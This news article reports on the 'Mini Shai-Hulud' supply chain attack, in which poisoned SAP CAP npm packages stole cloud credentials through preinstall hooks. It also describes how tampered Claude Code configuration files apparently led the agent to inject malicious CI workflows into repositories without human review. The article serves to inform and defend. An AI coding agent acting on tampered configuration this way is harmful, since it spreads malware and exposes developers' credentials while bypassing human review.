Morning Overview

A supply chain attack called ‘Mini Shai-Hulud’ poisoned official SAP packages and stole developer credentials through AI coding agent configs

On April 29, 2026, someone hijacked four widely used SAP packages on the npm registry, slipped credential-stealing malware into them, and then did something that, according to researchers at Mend.io, had not been publicly documented in a supply chain attack before: they weaponized an AI coding assistant’s configuration files to spread the infection across GitHub repositories automatically. Security researchers have since dubbed the attack “Mini Shai-Hulud,” after the sandworms in Frank Herbert’s Dune, and the name fits. The compromise burrowed through multiple layers of modern development infrastructure, from package manager to cloud platform to AI-powered agent, before anyone noticed it was there.

The four compromised packages belong to SAP’s Cloud Application Programming (CAP) framework, a toolset enterprises use to build business applications on SAP’s Business Technology Platform. Together, the packages had accumulated roughly 2.2 million downloads before the attack was detected. That number reflects total historical installs across npm (where download statistics are publicly verifiable through the npm registry’s API), not unique developers or active deployments, but it establishes that these were not obscure libraries. They sat at the center of a widely adopted enterprise ecosystem.

How the attack worked


Researchers at StepSecurity and Aikido Security were among the first to dissect the compromise. The attacker used npm preinstall hooks, a standard lifecycle mechanism that runs automatically whenever a developer installs a package, to download the Bun JavaScript runtime and execute obfuscated malware on the victim’s machine. Because the malicious logic was not embedded in the package source code itself but fetched at install time through a secondary runtime, many traditional static analysis tools missed it entirely.

Once running, the malware harvested cloud access tokens from environment variables and CI/CD secrets. Developers working on SAP CAP projects routinely store these credentials to authenticate with enterprise cloud systems. The stolen tokens were exfiltrated to attacker-controlled infrastructure, potentially giving the threat actor a foothold in corporate cloud environments far beyond the npm ecosystem.

The second vector is what makes Mini Shai-Hulud unusual. According to a detailed analysis by Mend.io, the attacker poisoned configuration files for Claude Code, Anthropic’s AI-powered coding assistant. Claude Code can be granted permissions to open pull requests and modify repository settings through its GitHub integration. By tampering with the agent’s config files, the attacker turned the AI tool into an unwitting propagation mechanism: it injected malicious continuous integration workflows into projects that used the compromised packages, allowing the tainted code to spread without direct human review.

Analysis by OX Security found that stolen developer credentials surfaced in at least 1,200 GitHub repositories, many of them tied to enterprise SAP deployments. Each of those repositories became a potential entry point for further exploitation. OX Security’s report described the credential leakage pattern but did not publish a full methodology paper or a standalone set of indicators of compromise (IOCs); the firm’s findings are drawn from its own analysis rather than a formal threat intelligence release. As researchers at RedRays noted, the combination of stolen cloud keys and compromised AI agents transformed what might have been a contained package incident into a broader failure spanning cloud infrastructure and developer automation.

What is still unknown


As of early June 2026, significant gaps remain in the public record. SAP has not released an official statement identifying which specific package versions were affected, how long the malicious code was live before detection, or what remediation the company has undertaken. The April 29, 2026 date cited across multiple research reports refers to when the compromise was detected by security researchers; whether the packages were actually poisoned on that date or at some earlier point has not been established. Without that disclosure, developers who installed updates on or around April 29 face the burden of conducting their own forensic review to determine whether their environments were compromised.

GitHub has not independently confirmed the 1,200-repository figure. OX Security’s count is based on the firm’s own analysis of where stolen credentials appeared, but the full methodology has not been published. The real number could be higher, since exfiltrated credentials that were not yet used publicly would not show up in that tally. It could also be lower in practical terms if some teams rotated their secrets before any exploitation occurred.

No one has publicly attributed the attack to a known threat actor or group. The “Mini Shai-Hulud” label was applied by researchers, not claimed by the attacker. Whether the operation was financially motivated, espionage-driven, or a proof-of-concept demonstration remains an open question. No affected enterprise has publicly reported data loss or unauthorized access from the stolen credentials, though that silence could reflect early-stage incident response, corporate reluctance to disclose, or exploitation that has not yet been detected.

Anthropic has not published a response addressing how Claude Code’s permission model was exploited or whether the company plans changes to its agent configuration security. That gap matters because the AI agent vector is the least independently verified aspect of the attack. Mend.io’s report describes the mechanism in detail, but without confirmation from Anthropic or independent replication, the full scope of AI-assisted propagation remains uncertain.

What the evidence supports


The technical analyses from StepSecurity, Mend.io, OX Security, RedRays, and Aikido Security represent the strongest available evidence. Each firm independently examined different facets of the attack based on direct artifact analysis, not secondhand summaries. Where their findings overlap, particularly on the April 29 date and the four-package scope, the corroboration strengthens confidence in those facts.

The confirmed behaviors are clear: malicious preinstall hooks downloaded an unexpected runtime, obfuscated payloads executed at install time, and cloud credentials were exfiltrated. The precise scale of downstream damage, the number of enterprises affected, and the full extent of AI agent exploitation are less certain and will likely shift as more organizations share their findings.

For developers and security teams, the immediate priorities are concrete. Anyone running SAP CAP projects should audit their npm dependencies for unexpected preinstall hooks, rotate cloud credentials stored in environment variables or CI/CD secrets, and review recent pull requests or CI workflow changes for unauthorized modifications. Teams that have granted AI coding agents write access to repositories should treat agent configuration files with the same rigor as any other automation credential, not as casual developer tooling settings.

Why AI agents change the supply chain threat model


Mini Shai-Hulud’s most lasting significance may have less to do with SAP or npm and more to do with what it reveals about the expanding attack surface of AI-assisted development. For years, supply chain security focused on package registries, build systems, and CI/CD pipelines. This attack demonstrates that AI coding agents, which increasingly hold repository-level permissions and can push code changes autonomously, are now part of that same trust chain.

The question facing every organization that uses AI coding tools is whether their security posture has kept pace with the permissions those tools hold. An AI agent with write access to a repository is, from a security standpoint, another automated actor whose configuration files, access tokens, and behavioral boundaries need the same scrutiny as a CI bot or deployment service account. Mini Shai-Hulud exploited the gap between how developers think about AI assistants and how attackers think about them. Until that gap closes, it will not be the last attack to try.

More from Morning Overview

*This article was researched with the help of AI, with human editors creating the final content.